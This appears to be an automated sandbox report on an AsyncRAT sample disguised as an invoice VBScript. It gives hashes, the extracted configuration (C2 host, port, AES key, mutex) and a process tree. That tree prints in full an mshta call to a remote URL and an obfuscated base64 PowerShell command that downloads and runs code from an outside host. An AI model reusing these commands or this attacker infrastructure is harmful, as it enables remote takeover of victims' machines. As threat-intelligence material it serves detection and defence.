asyncrat | 695c7c580690a30a5454ab156ad21d44da887098ad00b2cfff3b9b11e80b4c6d

General

Target

Invoice-ID43739424297.vbs
Size

305B
MD5

e78c88623c207166afa977ddb0afefc4
SHA1

ad5bc3c62e12ca88fc6bd8e51001156e379433fb
SHA256

695c7c580690a30a5454ab156ad21d44da887098ad00b2cfff3b9b11e80b4c6d
SHA512

9e13dfb091903e31d3ff535c17f0952e6445252f12101c777e31a590bae626833259de999bf5d621de4c0270a0a036bab6db84d1fa72dd0b727253a2c88046c2

Score

10^/10

asyncrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.minpic.de/k/bgnt/ce637

Extracted

Family

asyncrat

Version

0.5.7B

C2

fat7e07.ddns.net:1177

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
xl0t83bchaksRVJ46pFw5phLXuET6ukd
anti_detection
false
autorun
false
bdos
false
delay
Default
host
fat7e07.ddns.net
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
1177
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3928-9-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/3928-10-0x000000000040C6EE-mapping.dmp	asyncrat

Blocklisted process makes network request 4 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

9 2476 mshta.exe
11 2476 mshta.exe
13 2476 mshta.exe
16 3124 powershell.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3124 powershell.exe
3124 powershell.exe
3124 powershell.exe

flow	pid	process
9	2476	mshta.exe
11	2476	mshta.exe
13	2476	mshta.exe
16	3124	powershell.exe

pid	process
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeIncreaseQuotaPrivilege	3124	powershell.exe
Token: SeSecurityPrivilege	3124	powershell.exe
Token: SeTakeOwnershipPrivilege	3124	powershell.exe
Token: SeLoadDriverPrivilege	3124	powershell.exe
Token: SeSystemProfilePrivilege	3124	powershell.exe
Token: SeSystemtimePrivilege	3124	powershell.exe
Token: SeProfSingleProcessPrivilege	3124	powershell.exe
Token: SeIncBasePriorityPrivilege	3124	powershell.exe
Token: SeCreatePagefilePrivilege	3124	powershell.exe
Token: SeBackupPrivilege	3124	powershell.exe
Token: SeRestorePrivilege	3124	powershell.exe
Token: SeShutdownPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeSystemEnvironmentPrivilege	3124	powershell.exe
Token: SeRemoteShutdownPrivilege	3124	powershell.exe
Token: SeUndockPrivilege	3124	powershell.exe
Token: SeManageVolumePrivilege	3124	powershell.exe
Token: 33	3124	powershell.exe
Token: 34	3124	powershell.exe
Token: 35	3124	powershell.exe
Token: 36	3124	powershell.exe
Token: SeIncreaseQuotaPrivilege	3124	powershell.exe
Token: SeSecurityPrivilege	3124	powershell.exe
Token: SeTakeOwnershipPrivilege	3124	powershell.exe
Token: SeLoadDriverPrivilege	3124	powershell.exe
Token: SeSystemProfilePrivilege	3124	powershell.exe
Token: SeSystemtimePrivilege	3124	powershell.exe
Token: SeProfSingleProcessPrivilege	3124	powershell.exe
Token: SeIncBasePriorityPrivilege	3124	powershell.exe
Token: SeCreatePagefilePrivilege	3124	powershell.exe
Token: SeBackupPrivilege	3124	powershell.exe
Token: SeRestorePrivilege	3124	powershell.exe
Token: SeShutdownPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeSystemEnvironmentPrivilege	3124	powershell.exe
Token: SeRemoteShutdownPrivilege	3124	powershell.exe
Token: SeUndockPrivilege	3124	powershell.exe
Token: SeManageVolumePrivilege	3124	powershell.exe
Token: 33	3124	powershell.exe
Token: 34	3124	powershell.exe
Token: 35	3124	powershell.exe
Token: 36	3124	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WScript.exemshta.exe

description	pid	process	target process
PID 576 wrote to memory of 2476	576	WScript.exe	mshta.exe
PID 576 wrote to memory of 2476	576	WScript.exe	mshta.exe
PID 2476 wrote to memory of 3124	2476	mshta.exe	powershell.exe
PID 2476 wrote to memory of 3124	2476	mshta.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice-ID43739424297.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.minpic.de/k/bgnu/n5z5u
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBgAEUAWAAgACgAKABuAGAAZQBgAFcAYAAtAE8AYgBqAGAARQBgAGMAYABUACAAKAAoACcATgBlAHQAJwArACcALgAnACsAJwBXAGUAYgBjACcAKwAnAGwAaQBlAG4AdAAnACkAKQApAC4AKAAoACcARAAnACsAJwBvACcAKwAnAHcAJwArACcAbgAnACsAJwBsACcAKwAnAG8AJwArACcAYQAnACsAJwBkACcAKwAnAHMAJwArACcAdAByAGkAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAbgAnACsAJwBnACcAKQApAC4ASQBuAFYAbwBrAEUAKAAoACgAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAbgBwAGkAYwAuAGQAZQAvAGsALwBiAGcAbgB0AC8AYwBlADYAMwA3ACcAKQApACkAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAFwAfAAvACcALAAnACgAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXABcACcALAAnACkAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXAAvACcALAAnAHsAJwApAC4AcgBlAHAAbABhAGMAZQAoACcALwBcACcALAAnAH0AJwApAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3124

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:2800

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:3928

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2476-2-0x0000000000000000-mapping.dmp

Download
memory/3124-3-0x0000000000000000-mapping.dmp

Download
memory/3124-4-0x00007FFE97220000-0x00007FFE97C0C000-memory.dmp

Filesize
9.9MB

Download
memory/3124-5-0x000001FACB5E0000-0x000001FACB5E1000-memory.dmp

Filesize
4KB

Download
memory/3124-6-0x000001FAE71D0000-0x000001FAE71D1000-memory.dmp

Filesize
4KB

Download
memory/3124-7-0x000001FAE5020000-0x000001FAE5027000-memory.dmp

Filesize
28KB

Download
memory/3124-8-0x000001FAE5030000-0x000001FAE5038000-memory.dmp

Filesize
32KB

Download
memory/3928-9-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3928-10-0x000000000040C6EE-mapping.dmp

Download
memory/3928-11-0x0000000073600000-0x0000000073CEE000-memory.dmp

Filesize
6.9MB

Download
memory/3928-14-0x00000000057D0000-0x00000000057D1000-memory.dmp

Filesize
4KB

Download
memory/3928-15-0x0000000005D70000-0x0000000005D71000-memory.dmp

Filesize
4KB

Download
memory/3928-16-0x0000000005870000-0x0000000005871000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads